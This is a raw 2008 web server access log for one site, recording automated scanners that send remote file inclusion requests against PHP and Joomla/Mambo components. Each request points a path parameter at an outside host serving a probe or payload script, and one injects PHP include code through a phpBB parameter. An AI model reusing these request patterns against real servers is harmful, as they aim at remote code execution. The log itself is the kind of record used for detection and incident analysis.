221.116.201.42 - - [23/Apr/2008:12:06:36 -0700] "GET //index.php?_REQUEST=&_REQUEST%5Boption%5D=option,com_comprofiler&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.0" 200 34 "-" "libwww-perl/5.36" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:12:06:36 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG%5Bpear_dir%5D=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:12:06:37 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%5Boption%5D=option,com_comprofiler&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:12:06:37 -0700] "GET //includes/mailaccess/pop3.php?CONFIG%5Bpear_dir%5D=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:12:06:37 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG%5Bpear_dir%5D=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.dmulk.com"
89.111.176.20 - - [23/Apr/2008:12:06:53 -0700] "GET /logs/access.log/errors.php?error=http://www.westminsterakron.com/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.20 - - [23/Apr/2008:12:06:53 -0700] "GET /errors.php?error=http://www.westminsterakron.com/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.20 - - [23/Apr/2008:12:06:54 -0700] "GET /logs/errors.php?error=http://www.westminsterakron.com/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.205.39.23 - - [23/Apr/2008:12:07:00 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.jdsales.de/contenido/includes/list.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.205.39.23 - - [23/Apr/2008:12:07:00 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.jdsales.de/contenido/includes/list.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.205.39.23 - - [23/Apr/2008:12:07:01 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.jdsales.de/contenido/includes/list.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.227.101.118 - - [23/Apr/2008:12:07:16 -0700] "GET /logs/access_071218.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.101.118 - - [23/Apr/2008:12:07:17 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:12:07:17 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG%5Bpear_dir%5D=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.dmulk.com"
212.227.101.118 - - [23/Apr/2008:12:07:18 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.219.217.74 - - [23/Apr/2008:12:07:19 -0700] "GET /logs/access_080302.log//modules/My_eGallery/public/displayCategory.php?basepath=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.219.217.74 - - [23/Apr/2008:12:07:19 -0700] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.219.217.74 - - [23/Apr/2008:12:07:20 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.223.101.14 - - [23/Apr/2008:12:07:44 -0700] "GET /logs/access_080226.log//config.inc.php?path_escape=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:08:04 -0700] "GET /logs/access_080312.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:08:07 -0700] "GET /logs/access_080312.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
198.65.21.204 - - [23/Apr/2008:12:08:08 -0700] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.jdsales.de/contenido/includes/print.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
209.205.39.23 - - [23/Apr/2008:12:08:12 -0700] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.jdsales.de/contenido/includes/list.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:08:15 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:08:20 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:08:23 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:12:08:23 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST%5Boption%5D=option,com_comprofiler&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:08:25 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:12:08:30 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:12:08:31 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:12:08:31 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:12:08:46 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:12:08:47 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:12:08:47 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
221.116.201.42 - - [23/Apr/2008:12:09:01 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG%5Bpear_dir%5D=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.36" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:12:09:15 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:12:09:20 -0700] "GET /logs/access_080306.log/errors.php?error=http://www.franciscobeu.com/help/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:12:09:20 -0700] "GET /errors.php?error=http://www.franciscobeu.com/help/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:12:09:21 -0700] "GET /logs/errors.php?error=http://www.franciscobeu.com/help/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.194.149.65 - - [23/Apr/2008:12:09:23 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:12:09:38 -0700] "GET /logs/access_080223.log/errors.php?error=http://www.franciscobeu.com/help/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.90.83 - - [23/Apr/2008:12:09:50 -0700] "GET /logs/main.php?pagina=http://www.jdsales.de/contenido/includes/list.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
72.29.90.83 - - [23/Apr/2008:12:09:50 -0700] "GET /main.php?pagina=http://www.jdsales.de/contenido/includes/list.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:12:10:15 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.205.39.23 - - [23/Apr/2008:12:10:17 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.jdsales.de/contenido/includes/list.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.227.101.118 - - [23/Apr/2008:12:10:27 -0700] "GET /logs/access_071224.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.194.149.65 - - [23/Apr/2008:12:10:59 -0700] "GET /logs/access_080128.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:11:58 -0700] "GET /logs/access_080324.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [23/Apr/2008:12:12:13 -0700] "GET /logs/access_080324.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.quantpro.dyndns.org/cache/.dir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.192.125.88 - - [23/Apr/2008:12:12:22 -0700] "GET /logs/access_080228.log//components/com_simpleboard/image_upload.php?sbp=http://www.terravitagolfclub.com/weather/response.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.192.125.88 - - [23/Apr/2008:12:12:23 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.terravitagolfclub.com/weather/response.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.192.125.88 - - [23/Apr/2008:12:12:24 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.terravitagolfclub.com/weather/response.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.192.125.88 - - [23/Apr/2008:12:13:11 -0700] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://www.terravitagolfclub.com/weather/response.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.209.81.1 - - [23/Apr/2008:12:13:13 -0700] "GET /logs/access_080114.log/@rfihttp://membres.lycos.fr/harmless/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.209.81.1 - - [23/Apr/2008:12:13:13 -0700] "GET /@rfihttp://membres.lycos.fr/harmless/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.209.81.1 - - [23/Apr/2008:12:13:14 -0700] "GET /logs/@rfihttp://membres.lycos.fr/harmless/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.209.81.1 - - [23/Apr/2008:12:13:15 -0700] "GET /logs/access_080127.log/@rfihttp://membres.lycos.fr/harmless/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.209.81.1 - - [23/Apr/2008:12:13:16 -0700] "GET /logs/access_080114.log/@rfihttp://membres.lycos.fr/harmless/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.209.81.1 - - [23/Apr/2008:12:13:16 -0700] "GET /@rfihttp://membres.lycos.fr/harmless/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.209.81.1 - - [23/Apr/2008:12:13:17 -0700] "GET /@rfihttp://membres.lycos.fr/harmless/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.209.81.1 - - [23/Apr/2008:12:13:17 -0700] "GET /logs/@rfihttp://membres.lycos.fr/harmless/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.209.81.1 - - [23/Apr/2008:12:13:18 -0700] "GET /logs/access_080111.log/@rfihttp://membres.lycos.fr/harmless/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.209.81.1 - - [23/Apr/2008:12:13:18 -0700] "GET /logs/@rfihttp://membres.lycos.fr/harmless/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.19.130 - - [23/Apr/2008:12:13:39 -0700] "GET /logs/access_080214.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.19.130 - - [23/Apr/2008:12:13:39 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.19.130 - - [23/Apr/2008:12:13:39 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:12:13:58 -0700] "GET /logs/access_080105.log/help.php?css_path=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:12:13:58 -0700] "GET /help.php?css_path=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:12:13:58 -0700] "GET /logs/help.php?css_path=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.205.178.120 - - [23/Apr/2008:12:14:00 -0700] "GET /logs/access_080302.log//modules/My_eGallery/public/displayCategory.php?basepath=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.205.178.120 - - [23/Apr/2008:12:14:00 -0700] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.205.178.120 - - [23/Apr/2008:12:14:01 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.38.19.130 - - [23/Apr/2008:12:14:09 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:12:14:24 -0700] "GET /logs/access_071218.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:12:14:24 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:12:14:30 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.215.80.102 - - [23/Apr/2008:12:14:30 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.ramoviferramentas.com.br/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [23/Apr/2008:12:14:30 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.ramoviferramentas.com.br/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:12:14:34 -0700] "GET /logs/access_071218.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:12:14:34 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:12:14:36 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:12:14:43 -0700] "GET /logs/access_080114.log/show.php?path=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:12:14:43 -0700] "GET /show.php?path=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:12:14:43 -0700] "GET /logs/show.php?path=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:12:14:45 -0700] "GET /logs/access_080120.log/show.php?path=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.209.81.1 - - [23/Apr/2008:12:15:02 -0700] "GET /logs/access_080127.log/@rfihttp://membres.lycos.fr/harmless/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.209.81.1 - - [23/Apr/2008:12:15:07 -0700] "GET /logs/access_080302.log/@rfihttp://membres.lycos.fr/harmless/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.209.81.1 - - [23/Apr/2008:12:15:08 -0700] "GET /@rfihttp://membres.lycos.fr/harmless/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.54.21.194 - - [23/Apr/2008:12:15:09 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.bpec-english.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
204.209.81.1 - - [23/Apr/2008:12:15:10 -0700] "GET /logs/access_080218.log/@rfihttp://membres.lycos.fr/harmless/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:12:15:16 -0700] "GET /logs/access_071218.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.21.194 - - [23/Apr/2008:12:15:16 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.bpec-english.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:12:15:18 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:12:15:18 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.215.80.102 - - [23/Apr/2008:12:15:22 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://www.ramoviferramentas.com.br/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.15.133.133 - - [23/Apr/2008:12:15:39 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.studio-wave.com/concept/images/colour.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
204.15.133.133 - - [23/Apr/2008:12:15:41 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.studio-wave.com/concept/images/colour.txt?? HTTP/1.1" 200 4139 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:12:15:44 -0700] "GET /logs/access_071218.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:12:15:44 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:12:15:44 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://216.120.252.101/~newdayn/pix/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
58.138.12.147 - - [23/Apr/2008:12:15:47 -0700] "GET //Joomla_path/components/com_joomlaboard/file_upload.php?sbp=http://www.trepamontes4x4.com/digi/menu?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.91.145.249 - - [23/Apr/2008:12:15:54 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.quotationsforlife.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.91.145.249 - - [23/Apr/2008:12:15:54 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.quotationsforlife.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.91.145.249 - - [23/Apr/2008:12:15:54 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.quotationsforlife.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.209.81.1 - - [23/Apr/2008:12:16:01 -0700] "GET /logs/access_080127.log/@rfihttp://membres.lycos.fr/harmless/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.91.145.249 - - [23/Apr/2008:12:16:13 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.quotationsforlife.com/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
70.91.145.249 - - [23/Apr/2008:12:16:13 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.quotationsforlife.com/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:12:16:20 -0700] "GET /logs/access_080114.log/show.php?path=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:12:16:20 -0700] "GET /show.php?path=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:12:16:20 -0700] "GET /logs/show.php?path=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.16.163 - - [23/Apr/2008:12:16:23 -0700] "GET /logs/access_080120.log/show.php?path=http://home.kookmin.ac.kr/~law/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
